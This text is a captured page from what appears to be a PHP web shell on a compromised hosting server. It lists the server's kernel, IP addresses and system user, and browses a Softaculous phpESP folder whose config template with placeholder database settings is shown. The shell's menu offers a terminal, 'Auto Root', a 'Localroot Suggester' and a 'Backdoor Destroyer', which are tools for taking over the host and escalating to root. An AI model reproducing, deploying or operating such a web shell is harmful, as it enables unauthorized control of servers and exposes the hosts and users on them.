Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.154
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
phpesp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-06-28 16:02
php53
[ DIR ]
drwxr-xr-x
2017-06-28 16:02
php56
[ DIR ]
drwxr-xr-x
2017-06-28 16:02
clone.php
3.56
KB
-rw-r--r--
2017-03-24 00:33
edit.php
4.74
KB
-rw-r--r--
2017-03-24 00:33
edit.xml
433
B
-rw-r--r--
2016-04-05 01:50
fileindex.php
86
B
-rw-r--r--
2011-03-11 09:52
import.php
3.57
KB
-rw-r--r--
2017-03-24 00:33
info.xml
1.05
KB
-rw-r--r--
2017-03-17 01:49
install.js
921
B
-rw-r--r--
2013-05-07 02:17
install.php
3.8
KB
-rw-r--r--
2017-03-24 00:33
install.xml
1.11
KB
-rw-r--r--
2011-03-11 09:52
md5
5.08
KB
-rw-r--r--
2017-03-24 00:33
phpESP.ini.php
784
B
-rw-r--r--
2011-03-11 09:52
upgrade.php
2.77
KB
-rw-r--r--
2017-03-24 00:33
upgrade.xml
299
B
-rw-r--r--
2012-01-19 06:01
Save
Rename
<?php // use http or https? $ESPCONFIG['proto'] = 'http://'; $ESPCONFIG['base_url'] = '[[softurl]]'; // Database connection information // for the database type, change $ESPCONFIG['adodb_database_type'] (further down) $ESPCONFIG['db_host'] = '[[softdbhost]]'; $ESPCONFIG['db_user'] = '[[softdbuser]]'; $ESPCONFIG['db_pass'] = '[[softdbpass]]'; $ESPCONFIG['db_name'] = '[[softdb]]'; $DB_PREFIX = "[[dbprefix]]"; // If you want your database tables to use a prefix, set it here. $OLD_DB_PREFIX = ""; // When switching prefixes, give here the current existing prefix in the db $ESPCONFIG['email_from_name'] = "[[site_name]]"; $ESPCONFIG['email_from_address'] = '[[admin_email]]'; // the email return path for bounces ... $ESPCONFIG['email_return_path'] = '[[admin_email]]'; ?>